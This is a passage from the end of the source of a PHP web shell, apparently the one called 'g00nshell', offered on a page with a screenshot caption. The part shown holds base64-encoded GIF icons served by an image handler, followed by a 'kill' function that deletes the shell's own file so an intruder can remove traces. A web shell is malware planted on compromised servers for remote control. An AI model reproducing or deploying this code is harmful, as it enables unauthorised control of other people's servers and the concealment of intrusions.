851   "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" .
852   "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" .
853   "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7",
854   "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
855   "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
856   "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" .
857   "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=",
858   "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
859   "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
860   "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" .
861   "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7",
862   "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
863   "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
864   "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" .
865   "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" .
866   "kUgXEQA7",
867   "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" .
868   "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" .
869   "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" .
870   "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" .
871   "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" .
872   "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" .
873   "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" .
874   "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" .
875   "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" .
876   "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" .
877   "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" .
878   "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" .
879   "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" .
880   "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" .
881   "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" .
882   "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7",
883   "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
884   "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" .
885   "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" .
886   "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=",
887   "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
888   "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
889   "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" .
890   "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs=");
891   header('Content-type: image/gif');
892   echo base64_decode($images[$img]);
893   die();
894 }
895 function kill(){ // Shell deleter function
896   style();
897   echo("<form  method='post'>");
898   echo("Type 'confirm' to kill the shell:<br>\n<input type='text' name='ver' action='?act=kill'>");
899   echo("<input type='submit' value='Delete'>");
900   echo("</form>");
901   if($_POST['ver'] == "confirm"){
902     $self = basename($_SERVER['PHP_SELF']);
903     if(unlink($self)){echo("Deleted");}
904     else{echo("Failed");}
905   }
906 }
907 die();
908 ?>

g00nshell Script Screenshot

g00nshell script screenshot